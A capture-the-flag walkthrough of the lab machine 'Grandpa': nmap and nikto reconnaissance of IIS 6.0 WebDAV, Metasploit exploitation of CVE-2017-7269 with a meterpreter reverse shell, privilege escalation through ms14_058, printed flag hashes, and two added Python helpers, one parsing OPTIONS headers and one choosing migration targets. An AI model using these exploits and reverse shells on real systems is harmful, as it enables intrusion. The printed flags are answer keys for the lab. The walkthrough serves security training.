IIS 6.0 is running on port 80
```
# nmap -A -n -F -T5 grandpa.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 02:48 UTC
Nmap scan report for grandpa.htb (10.10.10.14)
Host is up (0.038s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Server Date: Sun, 23 Aug 2020 02:54:24 GMT
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# nmap -T4 --script vuln grandpa.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 02:49 UTC
Nmap scan report for grandpa.htb (10.10.10.14)
Host is up (0.028s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|_  /_vti_bin/shtml.exe: Frontpage file or folder
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 539.57 seconds

# perl nikto.pl -h http://grandpa.htb/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    grandpa.htb
+ Target Port:        80
+ Start Time:         2020-08-23 02:50:18 (GMT0)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPFIND SEARCH UNLOCK COPY MKCOL LOCK PROPPATCH listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8108 requests: 3 error(s) and 27 item(s) reported on remote host
+ End Time:           2020-08-23 03:16:32 (GMT0) (1574 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
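Everything nmap's http-webdav-scan and nikto reported above about methods comes from the headers of a single OPTIONS response. The following is an added example, not code from the original writeup: a small Python checker that parses an OPTIONS response and reports the IIS version, WebDAV support, and which write-capable methods appear in Allow (methods permitted on the requested resource) versus Public (methods the server supports overall, per RFC 2068). The sample response is constructed from the header values visible on this page (Content-Length is added only to make it a complete response); the host argument of the optional live probe is a placeholder.

```python
"""Added example (not from the original writeup): classify what an HTTP OPTIONS
response says about WebDAV exposure, the check nmap's http-webdav-scan and nikto
performed above. SAMPLE_OPTIONS_RESPONSE is constructed from the header values
visible on this page; the live probe target is a placeholder argument."""
import json
import socket
import sys

# Methods that create, delete or rewrite server-side resources (nikto's
# OSVDB-397/5646/5647 warnings cover PUT/DELETE/MOVE; the rest are WebDAV writes).
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Constructed from the Server/DAV/MS-Author-Via/Allow/Public values reported by
# nmap and nikto on this page; Content-Length is added only to complete the response.
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sun, 23 Aug 2020 02:54:24 GMT\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"MicrosoftOfficeWebServer: 5.0_Pub\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"X-AspNet-Version: 1.1.4322\r\n"
    b"MS-Author-Via: MS-FP/4.0,DAV\r\n"
    b"DASL: <DAV:sql>\r\n"
    b"DAV: 1, 2\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    b"PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def build_options_request(host, path="/"):
    """Raw HTTP/1.1 OPTIONS request for `path`, the same probe nmap/nikto send."""
    return (
        f"OPTIONS {path} HTTP/1.1\r\nHost: {host}\r\n"
        f"User-Agent: webdav-check\r\nConnection: close\r\n\r\n"
    ).encode()


def parse_headers(raw):
    """Return (status_code, {lower-cased header name: value}) from a raw response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    code = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return code, headers


def split_methods(value):
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def assess(raw):
    """Summarise WebDAV exposure. Allow lists methods permitted on the requested
    resource; Public (RFC 2068) lists what the server supports overall, so
    methods in Public but not in Allow may still work on other paths."""
    code, h = parse_headers(raw)
    allow = split_methods(h.get("allow", ""))
    public = split_methods(h.get("public", ""))
    server = h.get("server", "")
    dav = h.get("dav")
    return {
        "status": code,
        "server": server,
        "iis6": server.startswith("Microsoft-IIS/6."),
        "webdav": dav is not None,
        "dav_classes": [c.strip() for c in dav.split(",")] if dav else [],
        "ms_author_via": h.get("ms-author-via", ""),
        "allow": sorted(allow),
        "public": sorted(public),
        "write_methods_allowed": sorted(allow & WRITE_METHODS),
        "write_methods_public": sorted(public & WRITE_METHODS),
        "public_only": sorted(public - allow),
    }


def probe(host, port=80, path="/", timeout=5):
    """Send a real OPTIONS request and assess the reply (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_options_request(host, path))
        buf = b""
        while b"\r\n\r\n" not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return assess(buf)


if __name__ == "__main__":
    # With no argument, run against the constructed sample; otherwise probe a host.
    result = probe(sys.argv[1]) if len(sys.argv) > 1 else assess(SAMPLE_OPTIONS_RESPONSE)
    print(json.dumps(result, indent=2))
```

The gap between the two headers is the point worth noticing: Public advertises PUT, DELETE, MOVE, MKCOL and PROPPATCH even though Allow for / does not, so write methods may still be accepted on other paths on the same server, which is exactly the WebDAV exposure nikto flags with OSVDB-397/5646/5647.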
Starting the investigation from CVE-2017-7269
When I searched for [IIS 6.0 exploit], CVE-2017-7269 stood out, so I decided to try that first.
```
# msfconsole
msf5 > search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf5 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS grandpa.htb
RHOSTS => grandpa.htb
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.21
LHOST => 10.10.14.21
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.14:80 - The target is vulnerable.
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:52034) at 2020-08-23 04:27:32 +0000

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 616   396   svchost.exe
 676   396   svchost.exe
 740   396   svchost.exe
 764   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1076  396   cisvc.exe
 1116  396   svchost.exe
 1176  396   inetinfo.exe
 1216  396   svchost.exe
 1328  396   VGAuthService.exe
 1408  396   vmtoolsd.exe
 1456  396   svchost.exe
 1600  396   svchost.exe
 1700  396   alg.exe
 1800  616   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1832  348   logon.scr
 1912  396   dllhost.exe
 2180  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2248  616   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2304  2180  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2404  1076  cidaemon.exe
 2416  1076  cidaemon.exe
 2460  1076  cidaemon.exe
 2484  616   wmiprvse.exe

meterpreter > migrate 1800
[*] Migrating from 2304 to 1800...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > background
[*] Backgrounding session 1...
```
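The session above lands in rundll32.exe (PID 2304), a child of the IIS worker w3wp.exe (PID 2180); getuid returns "Access is denied" until the session is migrated into wmiprvse.exe (PID 1800), which runs as NT AUTHORITY\NETWORK SERVICE outside the worker's process tree. As an added example (not code from the original writeup), the Python below parses a Meterpreter ps table and lists migration candidates: processes whose owner is visible, with the same architecture as the current process, that are neither the exploited worker nor one of its descendants, so an IIS worker recycle cannot take the session down with it. The table is an abridged, constructed copy of the ps output shown above; the selection rules are this example's own assumptions about what makes a sane target.

```python
"""Added example (not from the original writeup): choose a Meterpreter migration
target from `ps` output. PS_SAMPLE is an abridged copy of the process list shown
on this page; the selection rules (owner visible, same arch, outside the IIS
worker's process tree) are this example's own assumptions about a safe target."""
import re

ARCHES = ("x86", "x64")

# Abridged from the ps output on this page; PID 2304 is where the payload landed.
PS_SAMPLE = r"""
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 348   272   winlogon.exe
 396   348   services.exe
 616   396   svchost.exe
 1076  396   cisvc.exe
 1456  396   svchost.exe
 1800  616   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2180  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2248  616   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2304  2180  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2404  1076  cidaemon.exe
 2484  616   wmiprvse.exe
"""


def parse_ps(text):
    """Parse Meterpreter's ps table into {pid: {...}}. Rows whose token could not
    be opened carry no Arch/Session/User/Path, exactly as in the output above."""
    procs = {}
    for line in text.splitlines():
        m = re.match(r"^\s*(\d+)\s+(\d+)\s+(\S+)(.*)$", line)
        if not m:
            continue  # header and separator rows
        pid, ppid, name, rest = int(m[1]), int(m[2]), m[3], m[4].split()
        while rest and rest[0] not in ARCHES:
            name += " " + rest.pop(0)  # names containing spaces, e.g. "[System Process]"
        arch = session = user = path = None
        if len(rest) >= 2:
            arch, session, tail = rest[0], int(rest[1]), rest[2:]
            if tail and ":\\" in tail[-1]:
                path = tail.pop()  # last token is the image path when present
            user = " ".join(tail) or None
        procs[pid] = {"pid": pid, "ppid": ppid, "name": name, "arch": arch,
                      "session": session, "user": user, "path": path}
    return procs


def ancestors(procs, pid):
    """Parent chain of `pid`, nearest first, stopping at the root or a cycle."""
    chain = []
    while pid in procs:
        parent = procs[pid]["ppid"]
        if parent == pid or parent in chain or parent not in procs:
            break
        chain.append(parent)
        pid = parent
    return chain


def migration_candidates(procs, current_pid, avoid=("w3wp.exe",)):
    """PIDs worth migrating to: owner visible (so our token can open them),
    same architecture as the current process, and neither the exploited worker
    nor one of its descendants, so an IIS worker recycle cannot kill the session."""
    cur = procs[current_pid]
    avoid = {n.lower() for n in avoid}
    picks = []
    for p in procs.values():
        if p["pid"] == current_pid or p["user"] is None:
            continue
        if cur["arch"] and p["arch"] != cur["arch"]:
            continue
        tree = [p["pid"]] + ancestors(procs, p["pid"])
        if any(procs[x]["name"].lower() in avoid for x in tree):
            continue
        picks.append(p["pid"])
    return sorted(picks)


if __name__ == "__main__":
    procs = parse_ps(PS_SAMPLE)
    parents = [procs[a]["name"] for a in ancestors(procs, 2304)[:2]]
    print("session lives in", procs[2304]["name"], "under", parents)
    print("migration candidates:", migration_candidates(procs, 2304))
```

Run against the sample it returns 1800 and 2248: wmiprvse.exe, the target chosen above, and davcdata.exe. The worker itself (2180) is excluded deliberately even though its owner is visible, since it is the process the exploit just corrupted.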
Looking for local vulnerabilities with local_exploit_suggester
```
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 34 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
```
Escalating privileges with ms14_058_track_popup_menu
```
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.21
LHOST => 10.10.14.21
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Launching notepad to host the exploit...
[+] Process 3052 launched.
[*] Reflectively injecting the exploit DLL into 3052...
[*] Injecting exploit into 3052...
[*] Exploit injected. Injecting payload into 3052...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:43704) at 2020-08-23 04:44:33 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2352 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>type "C:\Documents and Settings\Harry\Desktop\user.txt"
type "C:\Documents and Settings\Harry\Desktop\user.txt"
bdff5ec67c3cff017f2bedc146a5d869

C:\WINDOWS\system32>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
9359e905a2c35f861f6a57cecf28bb7b
```